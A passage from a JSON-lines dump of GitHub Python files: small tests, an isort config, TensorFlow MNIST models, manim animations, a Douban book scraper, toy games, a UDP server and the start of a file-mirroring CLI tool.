object()\"\"\"\n\n objectA = A()\n my_list = WeakList([objectA])\n assert len(my_list) == 1\n del objectA\n\n assert len(my_list) == 1 # gc did not run\n gc.collect() # must be called\n assert len(my_list) == 0\n","repo_name":"apieum/weakreflist","sub_path":"weakreflist/testDocExamples.py","file_name":"testDocExamples.py","file_ext":"py","file_size_in_byte":949,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"45"} +{"seq_id":"13238233510","text":"from __future__ import absolute_import, division, print_function, unicode_literals\n\nimport os\nfrom configparser import SafeConfigParser\nfrom pies import *\n\ndefault = {'force_to_top': [],\n 'skip': ['__init__.py', ],\n 'line_length': 80,\n 'known_standard_library': ['os', 'sys', 'time', 'copy', 're', '__builtin__', 'thread', 'signal', 'gc',\n 'exceptions', 'email'],\n 'known_third_party': ['google.appengine.api'],\n 'known_first_party': []}\n\ntry:\n with open(os.path.expanduser('~/.isort.cfg')) as config_file:\n config = SafeConfigParser()\n config.readfp(config_file)\n settings = dict(config.items('settings'))\n for key, value in iteritems(settings):\n existing_value_type = type(default.get(key, ''))\n if existing_value_type in (list, tuple):\n default[key.lower()] = value.split(\",\")\n else:\n default[key.lower()] = existing_value_type(value)\nexcept EnvironmentError:\n pass\n","repo_name":"habnabit/isort","sub_path":"isort/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":1053,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"45"} +{"seq_id":"11780008786","text":"import tensorflow as tf\nimport tensorflow.contrib.slim as slim\n\n# Model - CleverHans Keras MNIST model reimplementation w/ dropout\ndef model_(X, n_classes, tr_mode, reg_weight):\n with slim.arg_scope([slim.conv2d, slim.fully_connected], weights_regularizer=slim.l2_regularizer(reg_weight)):\n with slim.arg_scope([slim.conv2d], rate=(1,1)):\n drop1 = slim.dropout(X, keep_prob=0.8, is_training=tr_mode, scope='dropout1')\n conv1 = slim.conv2d(drop1, 64 * 1, [8, 8], stride=(2,2), padding='SAME', scope='conv1')\n conv2 = slim.conv2d(conv1, 64 * 2, [6, 6], stride=(2,2), padding='VALID', scope='conv2')\n conv3 = slim.conv2d(conv2, 64 * 2, [5, 5], stride=(1,1), padding='VALID', scope='conv3')\n drop2 = slim.dropout(conv3, keep_prob=0.5, is_training=tr_mode, scope='dropout2')\n flat = slim.flatten(drop2, scope='flat')\n logits = slim.fully_connected(flat, n_classes, activation_fn=None, scope='fc')\n softmax = tf.nn.softmax(logits, name='softmax')\n return logits, softmax\n\n# model from Appenix A.1:\n# a CNN with three convolutional layers and one fully connected layer,\n# where each convolutional layer is interlaced with ReLU, local\n# contrast normalization, and a pooling layer. For regularization,\n# dropout is used at the last layer, i.e., fully-connected layer, with\n# p = 0.5.\ndef model(X, n_classes, tr_mode, reg_weight):\n with slim.arg_scope([slim.conv2d, slim.fully_connected], weights_regularizer=slim.l2_regularizer(reg_weight)):\n conv1 = slim.conv2d(X, 64 * 1, [8, 8], stride=(2,2), padding='SAME', scope='conv1')\n pool1 = slim.max_pool2d(conv1, [2, 2], scope='pool1')\n conv2 = slim.conv2d(conv1, 64 * 2, [6, 6], stride=(2,2), padding='VALID', scope='conv2')\n pool2 = slim.max_pool2d(conv2, [2, 2], scope='pool2')\n conv3 = slim.conv2d(conv2, 64 * 2, [5, 5], stride=(1,1), padding='VALID', scope='conv3')\n drop = slim.dropout(conv3, keep_prob=0.5, is_training=tr_mode, scope='dropout')\n flat = slim.flatten(drop, scope='flat')\n logits = slim.fully_connected(flat, n_classes, activation_fn=None, scope='fc')\n softmax = tf.nn.softmax(logits, name='softmax')\n return logits, softmax\n","repo_name":"sunblaze-ucb/ensemble-detection-attacks","sub_path":"ensemble-specialists/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":2252,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"45"} +{"seq_id":"25444904812","text":"from src.superannotate import SAClient\nfrom tests.integration.base import BaseTestCase\n\nsa = SAClient()\n\n\nclass TestProjectRename(BaseTestCase):\n PROJECT_NAME = \"TestProjectRename\"\n NAME_TO_RENAME = \"TestPr\"\n PROJECT_DESCRIPTION = \"Desc\"\n PROJECT_TYPE = \"Vector\"\n NEW_PROJECT_NAME = \"new\"\n REPLACED_PROJECT_NAME = \"_ _ _ _ _ _ _ _ _ _\"\n BAD_PROJECT_NAME = r'/ \\ : * ? \" “ < > |' # noqa: w605\n\n def setUp(self, *args, **kwargs):\n self.tearDown()\n self._project = sa.create_project(\n self.PROJECT_NAME, self.PROJECT_DESCRIPTION, self.PROJECT_TYPE\n )\n\n def tearDown(self) -> None:\n projects = []\n projects.extend(sa.search_projects(self.PROJECT_NAME, return_metadata=True))\n projects.extend(sa.search_projects(self.NEW_PROJECT_NAME, return_metadata=True))\n projects.extend(\n sa.search_projects(self.REPLACED_PROJECT_NAME, return_metadata=True)\n )\n projects.extend(sa.search_projects(self.NAME_TO_RENAME, return_metadata=True))\n for project in projects:\n try:\n sa.delete_project(project)\n except Exception as _:\n pass\n\n def test_project_rename(self):\n sa.rename_project(self.PROJECT_NAME, self.NEW_PROJECT_NAME)\n meta = sa.get_project_metadata(self.NEW_PROJECT_NAME)\n self.assertEqual(meta[\"name\"], self.NEW_PROJECT_NAME)\n\n def test_rename_with_special_characters(self):\n sa.rename_project(self.PROJECT_NAME, self.BAD_PROJECT_NAME)\n sa.get_project_metadata(self.REPLACED_PROJECT_NAME)\n\n def test_rename_with_substring_of_an_existing_name(self):\n sa.rename_project(self.PROJECT_NAME, self.NAME_TO_RENAME)\n metadata = sa.get_project_metadata(self.NAME_TO_RENAME)\n self.assertEqual(self.NAME_TO_RENAME, metadata[\"name\"])\n sa.delete_project(self.NAME_TO_RENAME)\n","repo_name":"superannotateai/superannotate-python-sdk","sub_path":"tests/integration/projects/test_project_rename.py","file_name":"test_project_rename.py","file_ext":"py","file_size_in_byte":1900,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"45"} +{"seq_id":"38936919859","text":"from manim import *\nfrom colour import Color\n\ng = 9.8\ndef wavelength(k):\n return 2*PI/k\ndef omega(k):\n return np.sqrt(2*PI*k*g)\ndef vph(k):\n return np.sqrt(2*PI/k*g)\ndef vgr(k):\n return np.sqrt(1/2*PI/k*g)\n\n\nclass V(Scene):\n config.background_color = Color(\"#244\")\n\n def construct(self):\n title = Title(\"Angle of the wake\")\n y0 = -2.5\n path = Line([10,y0,0],[-6,y0,0], stroke_color=RED)\n waves = []\n vphdots = []\n vgrdots = []\n for angle in np.arange(0,PI+.01,PI/10):\n waves += Line([6,y0,0],[6*np.cos(angle),y0+6*np.sin(angle),0], stroke_opacity=.5)\n vphdots += Dot([6*np.cos(angle),y0+6*np.sin(angle),0], color=GOLD)\n vgrdots += Dot([3+3*np.cos(angle),y0+3*np.sin(angle),0], color=YELLOW)\n vphdots = VGroup(*vphdots)\n vgrdots = VGroup(*vgrdots)\n\n angle = PI/3\n firstwave = Line([6,y0,0],[6*np.cos(angle),y0+6*np.sin(angle),0], stroke_opacity=.5)\n obsline = Line([-6,y0,0],[6*np.cos(angle),y0+6*np.sin(angle),0])\n\n circle_vph = Arc(radius = 6, arc_center = [0,y0,0], angle = PI, color=GOLD)\n circle_vgr = Arc(radius = 3, arc_center = [3,y0,0], angle = PI, color=YELLOW)\n\n tanline_long = Line([-6,y0,0],[8,y0+14/np.sqrt(8),0], stroke_color=WHITE)\n tanline = Line([-6,y0,0],[3-1,y0+np.sqrt(8),0], stroke_color=WHITE)\n trigline = Line([3,y0,0],[3-1,y0+np.sqrt(8),0], stroke_color=WHITE)\n traceline = Line([3,y0,0],[-6,y0,0], stroke_color=WHITE)\n\n b1 = Brace(traceline, direction=traceline.copy().rotate(PI / 2).get_unit_vector())\n b1text = b1.get_tex(r\"3r\")\n b1gr = VGroup(b1,b1text)\n\n b2 = Brace(trigline, direction=trigline.copy().rotate(-PI / 2).get_unit_vector())\n b2text = b2.get_tex(r\"r\")\n b2gr = VGroup(b2,b2text)\n\n a1 = RightAngle(trigline,tanline_long, quadrant=(-1, -1))\n a2 = Angle(traceline, tanline, quadrant=(-1, 1), radius = 1)\n a2label = MathTex(r\"\\theta\")\n a2label.next_to(a2, RIGHT).shift(.1*UP)\n\n eqpos = 3*LEFT+UP\n eq1 = MathTex(r\"\\qquad \\sin \\theta =\", r\"\\frac{r}{3r} = \\frac13\", r\"\\phantom{\\approx 19.5^{\\circ}}\").move_to(eqpos)\n eq3 = MathTex(r\"\\theta = \\arcsin\", r\"\\frac{1}{3}\", r\"\\phantom{\\approx 19.5^{\\circ}}\").move_to(eqpos)\n eq4 = MathTex(r\"\\theta = \\arcsin\", r\"\\frac{1}{3}\", r\"\\approx 19.5^{\\circ}\").move_to(eqpos)\n\n self.add(path)\n self.add(circle_vph)\n self.add(firstwave,obsline)\n self.wait(5)\n self.play(FadeOut(obsline,firstwave))\n self.play(Create(VGroup(*waves)), run_time=3)\n self.wait()\n self.play(Create(vphdots), run_time=2)\n self.wait(7)\n self.play( ReplacementTransform(vphdots,vgrdots), run_time=2 )\n self.wait(3)\n self.play(Create(circle_vgr))\n self.wait(5)\n\n self.play(Create(tanline_long))\n self.wait(3)\n self.play(FadeOut(*waves,*vphdots,*vgrdots,circle_vph))\n self.wait()\n self.add(tanline)\n self.play(Create(VGroup(trigline,traceline)),FadeIn(title))\n self.play(FadeOut(tanline_long))\n self.play(FadeIn(a1, a2, a2label, b1gr,b2gr))\n\n self.play(Write(eq1))\n self.wait()\n self.play( ReplacementTransform(eq1,eq3))\n self.play( ReplacementTransform(eq3,eq4))\n self.wait(5)\n\nclass Photo(Scene):\n def construct(self):\n l1 = Line([0,0,0],[-15,15*np.tan(np.arcsin(1/3)),0])\n l2 = Line([0,0,0],[-15,-15*np.tan(np.arcsin(1/3)),0])\n path = Line([-15,0,0],[0,0,0], stroke_color=RED)\n a1 = Angle(l1,path,quadrant=[1,-1], radius=2)\n a1label = MathTex(r\"19.5^\\circ\")\n a1label.rotate(PI - 10*DEGREES).next_to(a1, LEFT).shift(.2*UP)\n vlines = VGroup(l1,path,l2,a1,a1label).rotate(PI).shift(9.5*RIGHT+.2*UP).set_opacity(.5)\n\n self.add(ImageMobject(\"elbe.png\"))\n self.add(vlines)\n\nclass Photo2(Scene):\n def construct(self):\n l1 = Line([0,0,0],[15,15*np.tan(np.arcsin(1/3)),0])\n l2 = Line([0,0,0],[15,-15*np.tan(np.arcsin(1/3)),0])\n path = Line([15,0,0],[0,0,0], stroke_color=RED)\n a1 = Angle(l1,path,quadrant=[1,-1], radius=2, other_angle=True)\n a1label = MathTex(r\"19.5^\\circ\")\n a1label.rotate(PI + 10*DEGREES).next_to(a1, RIGHT).shift(.2*UP)\n vlines = VGroup(l1,path,l2,a1,a1label).rotate(PI).shift(9.3*LEFT+.3*UP)#.set_opacity(.5)\n\n self.add(ImageMobject(\"rotterdam.png\"))\n self.add(vlines)\n\n\n","repo_name":"mvermeeren/SoME2-Wakes","sub_path":"2d-top.py","file_name":"2d-top.py","file_ext":"py","file_size_in_byte":4514,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"45"} +{"seq_id":"26097738157","text":"import random\nnumri_random = random.randint(1,10)\n\nnumri_random_string = str(numri_random)\n\nfor i in range (1,10):\n inputi_i_userit = input ('Shkruaj nje numer:')\n if inputi_i_userit == \"\":\n print ('Ju lutem shkruani diqka')\n elif inputi_i_userit != numri_random_string:\n print ('E paskate')\n else:\n print ('Bravo')\n break ","repo_name":"Fidaim1/Python-session1","sub_path":"venv/for_loop_detyra3.py","file_name":"for_loop_detyra3.py","file_ext":"py","file_size_in_byte":366,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"7151522155","text":"\nfrom cs1graphics import *\nclass Pyramid(Drawable):\n \"\"\"Represent a bullseye with an arbitrary number of bands.\"\"\"\n\n def __init__(self, numBands, size, primary='black', secondary='white'):\n \"\"\"Create a bullseye object with alternating colors.\n\n The reference point for the bullseye will be its center.\n\n numBands the number of desired bands (must be at least 1)\n radius the total radius for the bullseye (must be positive)\n primary the color of the outermost band (default black)\n secondary the color of the secondary band (default white)\n \"\"\"\n if numBands <= 0:\n raise ValueError('Number of bands must be positive')\n if size <= 0:\n raise ValueError('radius must be positive')\n\n Drawable.__init__(self)\n size = 12\n centerX = 6.0\n centerY = (numBands + 1) * size\n width = (numBands + 1) * size\n self._outer = Rectangle(width, size)\n self._outer.setFillColor(primary)\n self._outer.move(centerX, centerY)\n\n if numBands == 1:\n self._rest = None\n else: # create new bullseye with one less band, reduced radius, and inverted colors\n innerR = float(size) * (numBands-1) / numBands\n self._rest = Pyramid(numBands-1, innerR, secondary, primary)\n\n def _draw(self):\n self._beginDraw() # required protocol for Drawable\n self._outer._draw() # draw the circle\n if self._rest:\n self._rest._draw() # recursively draw the rest\n self._completeDraw() # required protocol for Drawable\n \n\npaper = Canvas(400, 400)\nsimple = Pyramid(6, 30)\nsimple.move(65, 80)\npaper.add(simple)\n\nblue = Pyramid(10, 80, 'darkblue', 'skyblue')\npaper.add(blue)\nblue.move(195,120)\n\n\n","repo_name":"Paparoni/algorithm-practice","sub_path":"recur_pyr.py","file_name":"recur_pyr.py","file_ext":"py","file_size_in_byte":1803,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"28021478207","text":"import socket\n\ns = socket.socket(socket.AF_INET,socket.SOCK_DGRAM)\ns.bind((\"0.0.0.0\",5555))\n\nbuff, addr = s.recvfrom(10)\n\nmessage = buff.decode(\"utf-8\")\nprint(\"From \", addr[0], \": \", message)\ncount = 0\nfor letter in message:\n if letter in ['a', 'e', 'i', 'o', 'u']:\n count+=1\n\ns.sendto(count.to_bytes(4, 'little'), addr)\n","repo_name":"alexovidiupopa/Networks","sub_path":"TCP UDP/Test21.10/Servers/udp.py","file_name":"udp.py","file_ext":"py","file_size_in_byte":331,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"72736613897","text":"from tkinter import *\nroot = Tk()\nroot.geometry(\"900x600\")\nroot.title(\"Sliding text animation\")\ntxt = \"Herokhor\"\n\nindex = 0\ntext =''\nlabel =Label(root,text=txt,font=(\"Arial\",30,'bold'),fg='red')\nlabel.pack(pady=100)\n\ndef slider():\n global index,text\n if index >=len(txt):\n index=-1\n text=''\n label.config(text=text)\n else:\n text = text+txt[index]\n label.config(text=text)\n index+=1\n label.after(100,slider)\nslider()\nroot.mainloop()","repo_name":"PremJibon/text-slider-python","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"7338243208","text":"#coding:utf-8\nimport re\nimport requests\nimport json\nimport os\nfrom bs4 import BeautifulSoup\n\n\ndef get_page_content(url):\n # headers = {\n # 'Referer': ' https: // www.google.com.hk /',\n # 'Upgrade - Insecure - Requests': '1',\n # 'Accept': 'text / html, application / xhtml + xml, application / xml;q = 0.9, image / webp, * / *;q = 0.8',\n # 'Accept - Encoding': 'gzip, deflate, sdch',\n # 'Accept - Language': 'zh - CN, zh;q = 0.8',\n # 'Cache - Control': 'max - age = 0',\n # 'User - Agent': 'Mozilla / 5.0(Windows NT 10.0;WOW64) AppleWebKit / 537.36(KHTML, likeGecko) Chrome / 51.0.2704.84Safari / 537.36'\n # }\n html = requests.get(url)\n print (html.status_code)\n return html.content\n\ndef get_book_page(home_html_content):\n html = re.findall('class=\\\"nbg\\\" href=\\\"(.*?)\\\"',home_html_content)\n return html\n\ndef get_book_info(book_page_content):\n book_info = {'title':\"\",\n 'author':\"\",\n 'press':\"\",\n 'translator':\"\",\n 'ISBN':\"\",\n 'publicationDate':\"\",\n 'pages':\"\",\n 'price':\"\",\n 'briefIntroduction':\"\",\n 'authorIntroduction':\"\"\n }\n try:\n book_info['title'] = re.findall(\"title=\\\"点击看大图\\\" alt=\\\"(.*?)\\\"\",book_page_content)[0]\n except:\n book_info['title'] = re.findall(\"(.*?)(豆瓣)\",book_page_content)[0]\n try:\n book_info['author'] = re.findall(\"(.*?)\",book_page_content)[0]\n except:\n book_info['author'] = None\n try:\n book_info['press'] = re.findall(\"出版社: (.*?)
    \",book_page_content)[0]\n except:\n book_info['press'] = None\n try:\n book_info['translator'] = re.findall(\"(.*?)\",book_page_content)[1]\n except:\n book_info['translator'] = None\n try:\n book_info['ISBN'] = re.findall(\"ISBN:(.*?)
    \",book_page_content)[0]\n except:\n book_info['ISBN'] = None\n try:\n book_info['publicationDate'] = re.findall(\"出版年: (.*?)
    \",book_page_content)[0]\n except:\n book_info['publicationDate'] = None\n try:\n book_info['pages'] = re.findall(\"页数: (.*?)
    \",book_page_content)[0]\n except:\n book_info['pages'] = None\n try:\n book_info['price'] = re.findall(\"定价: (.*?)
    \",book_page_content)[0]\n except:\n book_info['price'] = None\n introduction = re.findall('''
    \n

    (.*?)

    ''',book_page_content)\n if(introduction.__len__() == 2):\n if \"内容简介\" in book_page_content:\n if \"作者简介\" in book_page_content:\n book_info['briefIntroduction'] = introduction[0]\n book_info['authorIntroduction'] = introduction[1]\n book_info['authorIntroduction'] = book_info['authorIntroduction'].replace(\"

    \", \"\\n\")\n book_info['briefIntroduction'] = book_info['briefIntroduction'].replace(\"

    \", \"\\n\")\n book_info['authorIntroduction'] = book_info['authorIntroduction'].replace(\" \", \"\")\n book_info['briefIntroduction'] = book_info['briefIntroduction'].replace(\" \", \"\")\n else:\n book_info['briefIntroduction'] = introduction[1]\n book_info['authorIntroduction'] = None\n book_info['briefIntroduction'] = book_info['briefIntroduction'].replace(\"

    \", \"\\n\")\n book_info['briefIntroduction'] = book_info['briefIntroduction'].replace(\" \", \"\")\n else:\n book_info['authorIntroduction'] = introduction[1]\n book_info['briefIntroduction'] = None\n book_info['authorIntroduction'] = book_info['authorIntroduction'].replace(\"

    \", \"\\n\")\n book_info['authorIntroduction'] = book_info['authorIntroduction'].replace(\" \", \"\")\n\n elif(introduction.__len__() == 3):\n if '展开全部' in introduction[0] :\n book_info['briefIntroduction'] = introduction[1]\n book_info['authorIntroduction'] = introduction[2]\n book_info['authorIntroduction'] = book_info['authorIntroduction'].replace(\"

    \", \"\\n\")\n book_info['briefIntroduction'] = book_info['briefIntroduction'].replace(\"

    \", \"\\n\")\n book_info['authorIntroduction'] = book_info['authorIntroduction'].replace(\" \", \"\")\n book_info['briefIntroduction'] = book_info['briefIntroduction'].replace(\" \", \"\")\n else:\n book_info['briefIntroduction'] = introduction[0]\n book_info['authorIntroduction'] = introduction[2]\n book_info['authorIntroduction'] = book_info['authorIntroduction'].replace(\"

    \", \"\\n\")\n book_info['briefIntroduction'] = book_info['briefIntroduction'].replace(\"

    \", \"\\n\")\n book_info['authorIntroduction'] = book_info['authorIntroduction'].replace(\" \", \"\")\n book_info['briefIntroduction'] = book_info['briefIntroduction'].replace(\" \", \"\")\n elif(introduction.__len__() == 4):\n book_info['briefIntroduction'] = introduction[1]\n book_info['authorIntroduction'] = introduction[3]\n book_info['authorIntroduction'] = book_info['authorIntroduction'].replace(\"

    \", \"\\n\")\n book_info['briefIntroduction'] = book_info['briefIntroduction'].replace(\"

    \", \"\\n\")\n book_info['authorIntroduction'] = book_info['authorIntroduction'].replace(\" \", \"\")\n book_info['briefIntroduction'] = book_info['briefIntroduction'].replace(\" \", \"\")\n elif(introduction.__len__() == 0):\n book_info['briefIntroduction'] = None\n book_info['authorIntroduction'] = None\n elif(introduction.__len__() == 1):\n if \"内容简介\" in book_page_content:\n book_info['briefIntroduction'] = introduction[0]\n book_info['briefIntroduction'] = book_info['briefIntroduction'].replace(\"

    \", \"\\n\")\n book_info['briefIntroduction'] = book_info['briefIntroduction'].replace(\" \", \"\")\n book_info['authorIntroduction'] = None\n elif \"作者简介\" in book_page_content:\n book_info['briefIntroduction'] = None\n book_info['authorIntroduction'] = introduction[0]\n book_info['authorIntroduction'] = book_info['authorIntroduction'].replace(\"

    \", \"\\n\")\n book_info['authorIntroduction'] = book_info['authorIntroduction'].replace(\" \", \"\")\n return book_info\n\ndef save_book_file(book_info,file_name):\n file_name = str(file_name)\n file_address = \"文学/\"+file_name+\".txt\"\n file_address = file_address.decode('utf-8')\n f = open(file_address,\"w\")\n f.write(str(\"title:\"+book_info['title']+'\\n'))\n f.write(str(\"author:\"+book_info['author']+'\\n'))\n f.write(str(\"press:\"+book_info['press']+'\\n'))\n try:\n f.write(str(\"translator:\"+book_info['translator']+'\\n'))\n except:\n f.write(\"translator:NULL\"+'\\n')\n f.write(str(\"ISBN:\"+book_info['ISBN']+'\\n'))\n f.write(str(\"publicationDate:\"+book_info['publicationDate']+'\\n'))\n f.write(str(\"pages:\"+book_info['pages']+'\\n'))\n f.write(str(\"price:\"+book_info['price']+'\\n'))\n f.write(str(\"briefIntroduction:\"+book_info['briefIntroduction']+'\\n'))\n f.write(str(\"authorIntroduction:\"+book_info['authorIntroduction']))\n f.close()\n return True\n\ndef save_book_info_json(book_info,file_name):\n book_info = json.dumps(book_info,sort_keys=True,ensure_ascii=False,indent = 2)\n file_name = str(file_name)\n file_address = \"科普/\" + file_name + \".json\"\n file_address = file_address.decode('utf-8')\n f = open(file_address, \"w\")\n f.write(book_info,ignore)\n f.close()\n return True\n\ndef save_book_cover(book_page_content,cover_name):\n cover_url = re.findall('''''',book_page_content)[0]\n cover_name = str(cover_name)\n cover_address = \"科普/\"+cover_name+\".jpg\"\n cover_address = cover_address.decode('utf-8')\n f = open(cover_address,\"wb\")\n cover = requests.get(cover_url).content\n f.write(cover)\n f.close()\n return True\n\n\nif __name__ == \"__main__\":\n # book_page_content = get_page_content('http://book.douban.com/tag/%E6%96%87%E5%AD%A6?start=0&type=T')\n # book_page = get_book_page(book_page_content)\n # j = 1\n # for url in book_page:\n # print str(j)+\":正在下载信息:\"+url\n # book_info_content = get_page_content(url)\n # book_info = get_book_info(book_info_content)\n # save_book_info_json(book_info,j)\n # print str(j)+\":正在下载图片:\"+url\n # save_book_cover(book_info_content,j)\n # j = j + 1\n # book_info_content = get_page_content('https://book.douban.com/subject/4820710/')\n # print get_book_info(book_info_content)\n home_page = 'https://book.douban.com/tag/%E7%A7%91%E6%99%AE?start='\n page = 0\n for page in range(30,50):\n book_home_page = home_page+str(page*20)+'&type=T'\n book_page_content = get_page_content(book_home_page)\n book_page = get_book_page(book_page_content)\n j = 1\n for url in book_page:\n print (str(page*20+j)+\":正在下载信息:\"+url)\n book_info_content = get_page_content(url)\n book_info = get_book_info(book_info_content)\n save_book_info_json(book_info, page*20+j)\n print (str(page*20+j) + \":正在下载图片:\" + url)\n save_book_cover(book_info_content, page*20+j)\n j = j + 1","repo_name":"ponngzhao/DoubanBooksSpider","sub_path":"spider.py","file_name":"spider.py","file_ext":"py","file_size_in_byte":9736,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"36863823006","text":"# -*- coding:utf-8 -*-\n# class ListNode:\n# def __init__(self, x):\n# self.val = x\n# self.next = None\nclass Solution:\n def deleteDuplication(self, pHead):\n # write code here\n if pHead is None or pHead.next is None:\n return pHead\n head1=pHead.next\n if head1.val!=pHead.val:\n pHead.next=self.deleteDuplication(head1)\n else:\n while pHead.val==head1.val and head1.next is not None:\n head1=head1.next\n if head1.val !=pHead.val:\n pHead=self.deleteDuplication(head1)\n else:\n return None\n return pHead\n","repo_name":"badandworse/leetcodeAns","sub_path":"剑指offer/chapter3/18-2.py","file_name":"18-2.py","file_ext":"py","file_size_in_byte":657,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"45"} +{"seq_id":"3196985439","text":"import turtle\n\n# 별 모양으로 터틀 객체 생성\nt = turtle.Turtle()\nt.shape(\"turtle\")\nt.shapesize(2) # 크기를 2배로 설정\n\n# 내부를 채우기 위한 색 설정\nt.fillcolor(\"yellow\")\n\n# 내부를 채우기 시작\nt.begin_fill()\n\n# 별 모양 그리기\nfor i in range(5):\n t.forward(100) # 선 그리기\n t.right(144) # 144도 오른쪽으로 회전\n\n# 내부 채우기 종료\nt.end_fill()\n\n# 그리기 종료\nturtle.done()","repo_name":"qkrwhddms/soongsil_python","sub_path":"soongsil/myturtlestar.py","file_name":"myturtlestar.py","file_ext":"py","file_size_in_byte":451,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"32237378024","text":"import pandas as pd\n\nmyColumns = ('이름','나이')\nmyencoding = 'utf-8'\nmydata = [('김철수', 10), ('박영희', 20)]\n\nmyframe = pd.DataFrame(data=mydata, columns=myColumns)\nprint(myframe)\nmyframe2 = pd.DataFrame(data=mydata, columns=myColumns)\nprint(myframe2)\n\nmyframe.to_csv('csv_02_01.csv', index=False)\nmyframe2.to_csv('csv_02_02.csv', index=False, sep='#')\n\nmyframe = pd.read_csv('csv_02_01.csv')\nprint(myframe)\n\nmyframe2 = pd.read_csv('csv_02_02.csv')\nprint(myframe2)","repo_name":"seonghtun/allnew","sub_path":"python/pythondataproject/Ex-p187-03.py","file_name":"Ex-p187-03.py","file_ext":"py","file_size_in_byte":477,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"24044703258","text":"def complain():\n text = input(\"Введите текст жалобы: \")\n f = open(\"complains.txt\", \"a\", encoding=\"utf-8\")\n f.write(text+\"\\n\")\n f.close()\n print(\"Ваша жалоба будет рассмотрена в скором времени.\")\n\n\ndef suggestions():\n print(\"Предложения SkysmartBank\")\n f = open(\"suggestions.txt\", \"r\", encoding=\"utf-8\")\n text = f.read()\n print(text)\n f.close()\n","repo_name":"deposit1337/new_finance_app","sub_path":"bank.py","file_name":"bank.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"7541303090","text":"# utility function to return new node\nclass newNode:\n def __init__(self, val):\n self.val = val\n self.left = None\n self.right = None\n\n\ndef isFoldable(root):\n if root is None:\n return True\n return isFoldableUtil(root.left, root.right)\n\n\ndef isFoldableUtil(n1, n2):\n if n1 == None and n2 == None:\n return True\n if n1 != None or n2 != None:\n return False\n d1 = isFoldableUtil(n1.left, n2.right)\n d2 = isFoldableUtil(n1.right, n2.left)\n return d1 and d2\n\n\n# Driver code\nif __name__ == \"__main__\":\n \n \"\"\" The constructed binary tree is \n 1 \n / \\ \n 2 3 \n \\ / \n 4 5 \n\"\"\"\n root = newNode(1)\n root.left = newNode(2)\n root.right = newNode(3)\n root.left.right = newNode(4)\n root.right.left = newNode(5)\n \n if isFoldable(root):\n print(\"tree is foldable\")\n else:\n print(\"tree is not foldable\")\n \n# This code is contributed by\n# Anupam Baranwal(anupambaranwal)\n","repo_name":"OrangeBirdDrinksWater/PythonDS","sub_path":"DSbinarytree/9foldable1.py","file_name":"9foldable1.py","file_ext":"py","file_size_in_byte":965,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"20247036727","text":"import cgi\nimport os\nimport shutil\nimport sqlite3\nimport subprocess\nfrom pathlib import Path\nfrom tempfile import NamedTemporaryFile, TemporaryDirectory\nfrom typing import Union\nfrom urllib.parse import urlparse\n\nimport click\nimport requests\nfrom click.exceptions import ClickException\nfrom click_aliases import ClickAliasedGroup\n\nMIRROR_DIR = Path.home().joinpath(\".mirror\")\nDB_PATH = MIRROR_DIR.joinpath(\"db\")\nSAVE_DIR = MIRROR_DIR.joinpath(\"bin\")\n\nconn: sqlite3.Connection\ncursor: sqlite3.Cursor\n\nclass OctalParamType(click.ParamType):\n\t\"\"\"chmod-like octal parameters\"\"\"\n\tname = \"integer\"\n\t\n\tdef convert(self, value, param, ctx):\n\t\tif isinstance(value, int):\n\t\t\treturn value\n\t\ttry:\n\t\t\treturn int(value, 8)\n\t\texcept ValueError:\n\t\t\tself.fail(f\"{value!r} is not a valid octal integer\", param, ctx)\n\nOCTAL_PARAM = OctalParamType()\n\ndef main():\n\tglobal conn\n\tglobal cursor\n\t\n\t#create dirs\n\tSAVE_DIR.mkdir(parents=True, exist_ok=True)\n\tDB_PATH.touch(exist_ok=True)\n\t\n\t#setup db\n\tconn = sqlite3.connect(DB_PATH)\n\tcursor = conn.cursor()\n\twith conn:\n\t\tcursor.execute(\n\t\t\t\"\"\"CREATE TABLE IF NOT EXISTS mirrors (\n\t\t\t\tfilename text, \n\t\t\t\turl text, \n\t\t\t\tarchive_filename text, \n\t\t\t\tpost_install text\n\t\t\t);\"\"\"\n\t\t)\n\t\n\t#run cli\n\tmirror()\n\tconn.close()\n\n@click.group(context_settings={\"help_option_names\": [\"-h\", \"--help\"]}, cls=ClickAliasedGroup)\ndef mirror():\n\tpass\n\n@mirror.command(aliases=[\"addf\", \"add\", \"a\"])\n@click.argument(\"url\")\n@click.option(\"--filename\", \"-f\", type=Path)\n@click.option(\"--mode\", \"-m\", type=OCTAL_PARAM, default=\"755\", show_default=True)\n@click.option(\n\t\"--post-install\", \"--post\", \"-p\", help=\"arbitary shell script to run after installation\"\n)\ndef add_file(url: str, filename: Path, mode: int, post_install: str):\n\tprint(f\"Adding {url}\")\n\ttry:\n\t\tfilename = download_file(url, filename)\n\texcept (ValueError, FileExistsError, requests.exceptions.HTTPError) as e:\n\t\traise ClickException(str(e)) from e\n\tfilename.chmod(mode)\n\t\n\trun_post_install(filename, post_install)\n\t\n\twith conn:\n\t\tcursor.execute(\n\t\t\t\"INSERT INTO mirrors VALUES(?, ?, ?, ?)\", (str(filename), url, None, 